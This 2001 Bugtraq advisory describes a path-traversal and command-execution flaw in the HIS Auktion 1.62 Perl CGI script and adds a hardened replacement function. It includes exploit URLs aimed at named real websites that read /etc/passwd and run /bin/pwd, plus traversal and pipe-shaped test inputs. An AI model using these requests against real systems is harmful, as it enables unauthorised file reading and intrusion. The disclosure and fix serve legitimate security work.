[19158] in bugtraq
HIS Auktion 1.62: "show files" vulnerability and remote command
daemon@ATHENA.MIT.EDU (UkR-XblP)
Mon Feb 12 17:42:36 2001
Message-ID: <web-16668020@backend2.aha.ru>
Date: Mon, 12 Feb 2001 17:22:46 +0300
Reply-To: UkR-XblP <cuctema@OK.RU>
From: UkR-XblP <cuctema@OK.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
-----------UkR security team advisory #8------------
HIS Auktion 1.62: "show files" vulnerability and remote
command execution.
--------------------------------------------------
Name: HIS Auktion 1.62: "show files" vulnerability.
Date: 11.02.2001
Author: UkR-XblP
About: "HIS Auktion 1.62" is a link-catalog CGI
script. The creator's site: http://www.his-software.de
Problem:
-------from auktion.pl-------
sub readfile {
local($filename)=$_[0];   # first argument: the value of the "menue" CGI parameter, unchecked
local(@array);
open(f,$filename);        # two-argument open: no explicit mode, no validation of $filename
----------------------------
$filename is not filtered for special symbols.
Exploit: http://www.victim.com/cgi-bin/auktion.pl?menue=path/to/any/file/or/command
FIX: to fix the bug you need to add a check of the variable $filename
to the script. For example: $filename=~s/(\[\]\;\:\/\$\!\$\&\`\\\(\)\{\}\")/\\$1/g;
Example:
http://www.zimmerauktion.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../bin/pwd
|
http://www.chess-international.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
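The following is an added example, not code from HIS Auktion or from the advisory above. It shows the two properties a safe replacement for readfile() needs: a whitelist on the page name (escaping individual characters, as in the FIX line, still lets "../" sequences through), and Perl's three-argument open with an explicit '<' mode, so the name can never be interpreted as a pipe or as another open mode the way two-argument open(f,$filename) does. The directory /var/www/auktion/menue and the readfile_safe name are assumptions for the illustration.

```perl
#!/usr/bin/perl
# Added example (not from HIS Auktion or the advisory): a hardened
# readfile() for a CGI script that takes a page name from a query parameter.
use strict;
use warnings;
use File::Spec;
use Cwd qw(abs_path);

# Assumption: menu pages live only under this (hypothetical) directory.
my $MENU_DIR = abs_path('/var/www/auktion/menue') // '/var/www/auktion/menue';

# Returns (\@lines, undef) on success, or (undef, $reason) when refused.
sub readfile_safe {
    my ($name) = @_;

    # 1. Whitelist instead of escaping: only a short, plain page name is
    #    accepted, so '/', '..', '|', '>' and NUL never reach the file system.
    return (undef, 'rejected: bad page name')
        unless defined $name && $name =~ /\A[A-Za-z0-9_-]{1,64}\z/;

    # 2. Build the path ourselves and re-check, after symlink resolution,
    #    that it still lies below $MENU_DIR.
    my $path = File::Spec->catfile($MENU_DIR, "$name.txt");
    my $real = abs_path($path);
    return (undef, 'rejected: no such page')
        unless defined $real && -f $real;
    return (undef, 'rejected: outside menu directory')
        unless index($real, "$MENU_DIR/") == 0;

    # 3. Three-argument open with an explicit read mode: Perl will never
    #    treat the name as a pipe or as a write/append mode.
    open(my $fh, '<', $real) or return (undef, "open failed: $!");
    my @lines = <$fh>;
    close $fh;
    return (\@lines, undef);
}

# Constructed inputs: a normal page name, the traversal shape used in the
# advisory's requests, a pipe-shaped name, and a name with whitespace.
for my $p ('start', '../../../../../../etc/passwd', '/bin/pwd|', 'a b') {
    my ($lines, $err) = readfile_safe($p);
    printf "%-32s -> %s\n", $p, defined $err ? $err : scalar(@$lines) . ' lines';
}
```

Run on a host without the assumed directory, every input is refused; only 'start' is refused for the benign reason "no such page", the other three fail the whitelist before any path is touched. The same three-argument open and whitelist pattern applies to any CGI parameter that is turned into a file name.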